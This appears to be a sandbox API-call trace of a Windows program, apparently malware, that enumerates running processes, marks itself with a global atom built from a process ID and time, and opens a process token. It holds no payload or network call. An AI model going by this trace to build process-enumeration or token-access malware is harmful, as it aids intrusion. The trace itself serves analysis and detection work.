	[0070.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x220
	[0070.393] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.393] CloseHandle (hObject=0x220) returned 1
	[0070.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x220
	[0070.393] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.393] CloseHandle (hObject=0x220) returned 1
	[0070.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x220
	[0070.394] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.394] CloseHandle (hObject=0x220) returned 1
	[0070.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x220
	[0070.394] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.394] CloseHandle (hObject=0x220) returned 1
	[0070.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x220
	[0070.394] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.394] CloseHandle (hObject=0x220) returned 1
	[0070.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x220
	[0070.394] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.395] CloseHandle (hObject=0x220) returned 1
	[0070.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x220
	[0070.395] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.395] CloseHandle (hObject=0x220) returned 1
	[0070.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x220
	[0070.395] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.395] CloseHandle (hObject=0x220) returned 1
	[0070.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x220
	[0070.395] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.395] CloseHandle (hObject=0x220) returned 1
	[0070.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7282f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x220
	[0070.395] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.395] CloseHandle (hObject=0x220) returned 1
	[0070.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7282f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x220
	[0070.396] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.396] CloseHandle (hObject=0x220) returned 1
	[0070.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x220
	[0070.396] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.396] CloseHandle (hObject=0x220) returned 1
	[0070.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x220
	[0070.396] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.396] CloseHandle (hObject=0x220) returned 1
	[0070.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x220
	[0070.396] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.396] CloseHandle (hObject=0x220) returned 1
	[0070.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7282f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x220
	[0070.397] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.397] CloseHandle (hObject=0x220) returned 1
	[0070.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x220
	[0070.397] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.397] CloseHandle (hObject=0x220) returned 1
	[0070.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7282f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x220
	[0070.397] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.397] CloseHandle (hObject=0x220) returned 1
	[0070.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7282f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x220
	[0070.397] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.397] CloseHandle (hObject=0x220) returned 1
	[0070.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x220
	[0070.398] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.398] CloseHandle (hObject=0x220) returned 1
	[0070.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7282f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x220
	[0070.398] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.398] CloseHandle (hObject=0x220) returned 1
	[0070.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x220
	[0070.398] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.398] CloseHandle (hObject=0x220) returned 1
	[0070.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x220
	[0070.398] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.398] CloseHandle (hObject=0x220) returned 1
	[0070.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e8b0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x220
	[0070.398] IsWow64Process (in: hProcess=0x220, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.398] CloseHandle (hObject=0x220) returned 1
	[0070.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7282f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x220
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.399] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.400] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.400] GetProcessTimes (in: hProcess=0x220, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.400] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.401] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetLastError () returned 0x5
	[0070.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.402] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.403] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.403] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0070.403] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.403] GetLastError () returned 0x2
	[0070.404] GetLastError () returned 0x2
	[0070.404] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.404] GetProcAddress (hModule=0x765a0000, lpProcName="AddAtomA") returned 0x765bff60
	[0070.404] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.404] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomA") returned 0x765b1bc0
	[0070.404] GlobalAddAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0070.404] AddAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.404] CloseHandle (hObject=0x220) returned 1
	[0070.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x220
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.405] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] OpenProcessToken (in: ProcessHandle=0x220, DesiredAccess=0x20008, TokenHandle=0x27efb5c | out: TokenHandle=0x27efb5c*=0x230) returned 1
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] ProcessIdToSessionId (in: dwProcessId=0xc3c, pSessionId=0x27efa78 | out: pSessionId=0x27efa78) returned 1
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.406] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
	[0070.407] GetLastError () returned 0x2
